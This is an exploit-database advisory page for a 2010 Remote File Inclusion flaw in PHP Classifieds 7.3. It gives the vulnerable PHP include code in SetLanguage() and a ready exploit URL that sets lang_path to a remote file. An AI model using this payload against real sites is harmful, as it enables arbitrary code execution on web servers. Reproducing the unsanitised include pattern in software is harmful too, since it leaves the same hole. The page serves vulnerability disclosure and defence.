header-logo
Suggest Exploit
vendor:
PHP Classifieds
by:
alsa7r
8,8
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: PHP Classifieds
Affected Version From: 7.3
Affected Version To: 7.3
Patch Exists: NO
Related CWE: N/A
CPE: a:classifieds:php_classifieds:7.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2010

PHP Classifieds v7.3 RFI Vulnerability

A Remote File Inclusion (RFI) vulnerability exists in PHP Classifieds v7.3. An attacker can exploit this vulnerability to include a remote file containing malicious code and execute it in the context of the web server process. The vulnerability is due to insufficient sanitization of user-supplied input to the 'lang_path' parameter of the 'SetLanguage()' function in 'class.phpmailer.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. Successful exploitation of this vulnerability can result in arbitrary code execution in the context of the web server process.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. The application should validate user-supplied input and reject requests containing malicious code.
Source

Exploit-DB raw data:

==================================
  PHP Classifieds v7.3 RFI Vulnerability
==================================
 
====================================================
[x] ExpL0it TitLe : PHP Classifieds v7.3 RFI Vulnerability
[x] DatE          : 09 September 2010
[x] AutH0r        : alsa7r
[x] Contact       : TBT9@hotmail.com
[x] TestEd 0n     : windows 7 
[x] d0rK          : :P
====================================================
 
==========================================================================================
[x]bug heRe:
 function SetLanguage($lang_type, $lang_path = "tools/phpmailer/language/") {
    	//echo $lang_path.'phpmailer.lang-'.$lang_type.'.php';
        if(file_exists($lang_path.'phpmailer.lang-'.$lang_type.'.php'))
            include($lang_path.'phpmailer.lang-'.$lang_type.'.php');
        else if(file_exists($lang_path.'phpmailer.lang-en.php'))
            include($lang_path.'phpmailer.lang-en.php');
        else
    }
==========================================================================================
 
==================================================================
[x]expL0iT:
http://[site]/classifieds/tools/phpmailer/class.phpmailer.php?lang_path=[EV!L]
==================================================================
 
============================================================================================
[x]th4nKs t0:
Mr.wolf , morabko , unit x team , sudan hacker team
============================================================================================
 
=====================
TBT9[at]hotmail[dot]com
=====================

Navigation

Suggest Exploit

Services By CQR